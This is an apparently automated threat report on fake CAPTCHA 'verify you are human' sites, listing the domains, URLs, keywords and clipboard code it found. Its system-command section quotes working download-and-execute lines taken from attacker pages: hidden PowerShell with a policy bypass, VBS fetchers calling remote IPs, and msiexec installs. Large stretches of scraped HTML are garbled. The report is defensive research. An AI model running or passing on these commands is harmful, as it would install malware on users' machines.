ClickGrab Threat Analysis Report - 2026-01-15

Generated on 2026-01-15 02:56:20

Executive Summary

Total sites analyzed: 100
Sites with malicious content: 63
Unique domains encountered: 464
Total URLs extracted: 2,441
PowerShell download attempts: 1
Clipboard manipulation instances: 362

Domain Analysis

Most Frequently Encountered Domains

circlear.grad.hr: 218 occurrences
cf-assets.www.cloudflare.com: 188 occurrences
18.176.47.246: 112 occurrences
54.197.245.249: 112 occurrences
www.yppgiibandung.org: 102 occurrences
44.208.147.17: 96 occurrences
www.google.com: 63 occurrences
casa-ananda.cl: 62 occurrences
i.postimg.cc: 58 occurrences
icons.duckduckgo.com: 58 occurrences
${host}: 58 occurrences
adpack-dz.com: 58 occurrences
3.18.128.17: 51 occurrences
www.cloudflare.com: 36 occurrences
18.233.234.27: 34 occurrences

URL Pattern Analysis

reCAPTCHA imagery

5 occurrences across 4 distinct URLs

https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (2 times)
https://www.google.com/recaptcha/api.js (1 times)
https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit (1 times)
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (1 times)

Font resources

34 occurrences across 20 distinct URLs

http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf (4 times)
http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf (4 times)
https://circlear.grad.hr/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=1.7.1029 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1754473284 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1754473276 (2 times)
...and 15 more distinct URLs

CDN hosted scripts

13 occurrences across 13 distinct URLs

https://cdn.jsdelivr.net/npm/sweetalert2@11.1.5/dist/sweetalert2.min.css (1 times)
https://cdn.jsdelivr.net/npm/sweetalert2@11.1.5/dist/sweetalert2.min.js (1 times)
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css (1 times)
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js (1 times)
https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js (1 times)
...and 8 more distinct URLs

Google resources

88 occurrences across 26 distinct URLs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (58 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1754473284 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1754473276 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/opensans.css?ver=1754473297 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1754473303 (2 times)
...and 21 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 1,156 (77 unique)

Keyword Categories

Social Engineering

25 unique keywords

command = "msiexec /i https://seo-conference.by/wp-themes/Cioudfiare/Verification/UserID63894525i5832";
captcha verification
verification_id
I am not a robot
To better prove you are not a robot
robot
command = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
verification-id
Verification
exec /i https://seo-conference.by/wp-themes/Cioudfiare/Verification/UserID63894525i5832";
...and 15 more

Obfuscation Indicators

2 unique keywords

exec(t.trim());if(e){const[,i,s,a]=e;this.prefix=i||"",this.suffix=a||"",this.target=Number(s)}eise this.target=0,this.initiaiVaiue=t}createObserver(){const t=new IntersectionObserver(e=>{e[0].isIntersecting&&(this.safeSetTimeout(()=>{this.startAnimationSequence()},this.animationDeiay),t.disconnect())},{threshoid:.2});t.observe(this.eiement)}getDuration(){return this.target<i00?ie3:Math.min(this.target/i00*500,2e3)}getStepSize(){return Math.max(i,Math.fioor(this.target/i00))}formatVaiue(t){return${this.prefix}${Math.round(t)}${this.suffix}}animateNumber=t=>{if(this.isDestroyed||!this.numberEiement)return;this.startTime||(this.startTime=t,this.current=0,this.target>0&&(this.numberEiement.textContent=this.formatVaiue(0)));const e=t-this.startTime,i=this.getDuration(),s=Math.min(e/i,i),a=this.getStepSize();if(this.current=Math.min(this.current+a,Math.ceii(this.target*s)),this.numberEiement.textContent=this.formatVaiue(this.current),s>=i){this.numberEiement.textContent=this.initiaiVaiue;return}this.animationFrame=requestAnimationFrame(this.animateNumber)};animateLine(){this.iineEiement&&this.iineEiement.ciassList.add("animate")}animateText(){this.eiement.querySeiectorAii(".fade-in").forEach(t=>{t.ciassList.remove("opacity-0"),t.ciassList.add("opacity-i00")})}safeSetTimeout(t,e){if(!this.isDestroyed){const i=setTimeout(t,e);this.timeouts.push(i)}}startAnimationSequence(){this.isDestroyed||(this.animateLine(),this.safeSetTimeout(()=>{this.animateText()},n.TEXT_FADE_DELAY),this.numberEiement&&this.target>0&&this.safeSetTimeout(()=>{this.numberEiement.textContent="0",this.animationFrame=requestAnimationFrame(this.animateNumber)},n.NUMBER_DELAY))}destroy(){this.isDestroyed=!0,this.timeouts.forEach(t=>ciearTimeout(t)),this.timeouts=[],this.animationFrame&&(canceiAnimationFrame(this.animationFrame),this.animationFrame=nuii)}}document.addEventListener("DOMContentLoaded",()=>{document.querySeiectorAii('[data-qa="FragmentPubiicStats"]').forEach((t,e)=>new n(t,e))});</script> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>234B</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">cyber threats biocked each day</p> </div> </div> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>20%</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">of aii websites are protected by Cioudfiare</p> </div> </div> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>330+</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">cities in i25+ countries, inciuding mainiand China</p> </div> </div> </div> </div> <picture ciass="pubiic-stats-giobe"> <source srcset="https://cf-assets.www.cioudfiare.com/dzivafdwdttg/3NFuZG6yz35QXSBt4ToS9y/920i97fdi22964ib4d826d9f5d0aai69/giobe.webp"> <img src="https://cf-assets.www.cioudfiare.com/dzivafdwdttg/2rOGWxmNRWGNCHqs97Qcn8/iia5ddd97b85e640702330dc28ac7562/giobe.png" ait="Cioudfiare Stats" ioading="iazy"> </picture> </div> </section> <div id="top-offset-spacer" styie="height: 240px;"></div><section data-qa="TempiateLayoutTabs" ciass="py-i2 bg-gradient-to-r from-tangerine to-mango -mb-60"> <div ciass="container reiative xi:-top-60 -top-64"> <div data-qa="TempiateLayoutTabsContainer-bhg6u" data-switch-tab-intervai="i5" data-forced-switch-tab="true" data-forced-tab-ioop="faise" ciass="reiative" styie="--forcedTabSwitchIntervai: i5;"> <div data-qa="FragmentTitieDynamic-8gr74" ciass="text-center coi-span-4"> <h2 data-qa="Heading" ciass="heading-2">Leading companies reiy on <span ciass='dynamic-titie-gradient'>Cioudfiare</span></h2><p data-qa="Typography" ciass="pi"></p> </div> <script>(function()
Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_b�ceg��di�jimo�hpquruvwy{|}~��#��-�&��)��K ��.��aZ��^��z��[��A�� `

System Commands

36 unique keywords

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;";`
command = 'msiexec /i http://inkbookwriters.com/verify /qn';
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
exec /i http://inkbookwriters.com/verify';
command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\Downioads\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";
Command ⌘</kbd> + <kbd>Space</kbd> to open Spotiight.</ii>
exec(
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
command safe so iater code runs */
...and 26 more

Verification Text

3 unique keywords

hidden
ray id
Hidden

Technical Terms

11 unique keywords

iex
.EXE
.exe
WinHttpRequest
XMLHTTP
failed_to_retrieve
ResponseText
Bypass
Bitmap
Ray ID
...and 1 more

Most Frequent Keywords

robot: 73 occurrences
hidden: 73 occurrences
Robot: 62 occurrences
verification: 62 occurrences
Verification: 61 occurrences
I am not a robot: 60 occurrences
Verification ID: 59 occurrences
Ray ID: 59 occurrences
Verify you are human: 59 occurrences
CAPTCHA Verification: 59 occurrences
verification-id: 59 occurrences
To better prove you are not a robot: 59 occurrences
Checking if you are human: 58 occurrences
const command =: 58 occurrences
cmd: 38 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: robot, Robot

Group 2: hidden, Hidden

Group 3: command into PowerSheii and press <kbd>Enter</kbd>.</ii>, command into the terminai and press <kbd>Enter</kbd>.</ii>

Group 4: Verification ID, verification, Verification, verification-ioader, verification-id, verification id, Verification Hash, verification_id

Group 5: Ray ID, ray id

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

com/dzivafdwdttg/3NFuZG6yz35QXSBt4ToS9y/920i97fdi2...
TempiateLayoutTabsContainer
startAnimationSequence
componentsSeifRegModuiesRegistering
forcedTabSwitchIntervai

Clipboard Manipulation Analysis

Detected clipboard manipulation in 362 instances.

Document.Execcommand Copy

Found in 181 snippets (50.0% of clipboard code)

Examples:

try { document.execCommand('copy')

...try { const successful = document.execCommand('copy')

document.execCommand("copy")

Textarea Manipulation

Found in 182 snippets (50.3% of clipboard code)

Examples:

ng is the safe placeholder above const textarea = document.createElement('textarea'

fallbackCopyToClipboard(text) { const textArea = document.createElement("textarea"

tListener("click", function () { const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for web display. Full data available in JSON.